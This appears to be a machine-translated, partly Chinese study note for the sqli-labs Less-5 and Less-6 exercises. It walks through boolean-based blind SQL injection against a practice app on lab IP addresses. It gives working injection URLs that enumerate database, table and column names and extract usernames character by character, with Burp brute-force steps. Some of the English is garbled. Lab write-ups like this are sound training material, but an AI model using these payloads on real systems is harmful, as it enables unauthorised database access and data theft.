sqli lab5-6

left (a, b), taken from the left side of a front position b, a right is returned, an error is returned 0

select left (database (), 1) = 's'; s front whether a

regexp function: select user () regexp 'r'

The results user () is the root, regexp to match the root of the regular expression

like function: select user () is similar like 'ro%' matches regexp.

substr(a,b,c) select substr() XXXX

substr (a, b, c) starting from the position b, taken a bit string of length c

ascii () will be converted to a string value ascii

select ascii (substr ((select database ()), 1,1)); or a direct echo 115:

select ascii (substr ((select database ()), 1,1))> 110; if more than 110, it will return a 0 otherwise.

6. chr (number) or the ord ( 'letter') used in python two functions determine the current value is the number ascii

For security database:

Less-05

Guess there are three columns

Guess database

method one

http://192.168.50.254/sqli/Less-5/?id=1'and left((select database()),1)='s '--+;

burp capture brute force

、

After entering, to get the packet Burp, we send the data to the blasting module:

Then blasting module, first clear the other values, then add it as a variable to a

Select the type of brute force, the length is 1:

Thread 50

Crack the second letter

或者是使用if来进行判断测试：
http://127.0.0.1/sqli/Less-5/?id=1‘ and ascii(substr((select database()),1,1))>156--+（此时是没有返回的）（这种方法是错误的）

因为此时没有选择任何数据库数据库为空所以不管写多大数都会有回显信息

http://192.168.50.100/sqli/Less-5/?id=1' and

ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100 --+

此处不回显说明小于100

一个一个的猜库

猜第二个字母

以此类推得到库名 challenge

1. http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ 通过二分法猜解得到所有的库,红色为可变参数。
2. http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+ 再次通过二分法可猜解得到security下的所有表。其中，红色为可变参数。
3. http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --+ 通过二分法可猜解users内的字段，其中红色为可变参数。
4. http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select username from security.users limit 1,1),1,1))>1--+继续猜解即可得到字段内的值。

Less-6

加了单引号没有什么不同

加了双引号则报错

说明是布尔盲注

然后再爆列

3回显 4报错说明有三列

完整注入流程：
1. http://127.0.0.1/sqli/Less-5/?id=1” and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ 通过二分法猜解得到所有的库,红色为可变参数。
2. http://127.0.0.1/sqli/Less-5/?id=1”and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+ 再次通过二分法可猜解得到security下的所有表。其中，红色为可变参数。
3. http://127.0.0.1/sqli/Less-5/?id=1” and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --+ 通过二分法可猜解users内的字段，其中红色为可变参数。
4. http://127.0.0.1/sqli/Less-5/?id=1”and ascii(substr((select username from security.users limit 1,1),1,1))>1--+继续猜解即可得到字段内的值。